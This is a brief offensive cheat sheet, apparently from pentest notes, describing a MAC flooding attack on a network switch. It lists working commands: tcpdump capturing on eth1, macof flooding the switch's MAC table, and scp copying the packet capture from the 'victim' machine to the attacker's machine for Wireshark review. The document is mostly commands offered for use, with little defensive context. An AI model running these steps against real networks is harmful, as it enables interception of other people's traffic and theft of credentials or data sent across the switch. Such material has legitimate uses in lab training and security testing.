MAC Flooding Attack
Last modified: 2022-11-20
It is a technique that compromises the security of network switches.
Open Two SSH Sessions
Start the SSH session 1 in terminal 1.
Start the SSH session 2 in terminal 2.
Flood the Switch and Capturing the Traffic
In the session 1, start tcpdump and keep it running.
tcpdump -A -i eth1 -w /tmp/tcpdump.pcap
In the session 2, start flooding the switch (here "eth1" interface).
macof -i eth1
After about 30 seconds, stop macof and tcpdump.
Investigate the Captured Traffic
In your local machine, transfer the dumped file named "/tmp/tcpdump.pcap" from the target machine to your local machine.
scp victim@<target-ip>:/tmp/tcpdump.pcap .
Investigate this file using Wireshark